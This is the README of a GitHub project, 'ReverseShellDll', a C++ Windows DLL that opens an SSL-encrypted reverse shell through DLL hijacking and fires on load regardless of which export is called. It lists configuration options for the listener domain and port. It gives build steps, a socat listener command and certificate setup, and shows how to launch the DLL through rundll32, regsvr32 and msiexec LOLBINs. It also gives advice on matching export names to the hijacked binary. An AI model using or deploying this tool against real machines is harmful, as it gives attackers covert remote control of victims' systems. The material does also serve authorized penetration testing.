limbenjamin / ReverseShellDll

Licence: other
C++ Windows Reverse Shell - Universal DLL Hijack | SSL Encryption | Statically Linked

ReverseShellDLL

Main Features

  1. Universal DLL Hijack - ReverseShellDLL uses the DLL_PROCESS_ATTACH notification to ensure that the reverse shell is executed regardless of which export is called. When the reverse shell exits, the process is terminated gracefully, so the "export not found" error message is never shown.
  2. SSL Encryption - ReverseShellDLL uses the OpenSSL library to encrypt the connection.
  3. Statically Linked - ReverseShellDLL runs on all recent Windows versions out of the box, without requiring the .NET Framework or the Microsoft C Runtime library to be installed.

Configuration

domain     - Domain/IP address where the listener is running
port       - Port where the listener is running
process    - Shell to execute (e.g. cmd.exe, powershell.exe, bash.exe)
exitCmd    - Typing this command will cause the program to terminate

bufferSize (bytes) / delayWait (milliseconds)
- A high bufferSize and a high delayWait result in large chunks of output being buffered and sent at one time.
- A low bufferSize and a low delayWait result in a "smooth" terminal experience at the expense of more small packets.

* Some binaries verify that the exports match before loading a DLL. You might have to change the export names in ReverseShellDLL.cpp to match the target hijack binary.

Compilation Instructions

  1. Install OpenSSL. I used the version from https://slproweb.com/products/Win32OpenSSL.html. The installation path is C:\Program Files\OpenSSL-Win64. Make sure to select the option to copy the DLLs to the system folder during installation; otherwise, you may have to tweak the Project Properties to get it to compile.
  2. Clone the repository with git.
  3. Configure as necessary.
  4. Build the binary.

Running

  1. Generate an SSL certificate on the listener machine:

    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
    cat key.pem cert.pem > test.pem

  2. Start the listener. I have had success with socat 1.7.3.2 and later; earlier versions might have issues with protocol negotiation. If using bash, remove crnl from the socat command line.

    socat openssl-listen:1443,reuseaddr,cert=test.pem,verify=0,fork,crnl -

  3. Deploy the DLL in the appropriate hijack location. If necessary, it can also be started via rundll32, regsvr32 or other LOLBINs:

    rundll32.exe ReverseShellDLL.dll,UniversalSoWhatEverYouTypeHereWillWork
    rundll32.exe ReverseShellDLL.dll,CoCreateInstance
    regsvr32.exe ReverseShellDLL.dll
    msiexec /y "C:\path\to\dll\ReverseShellDLL.dll"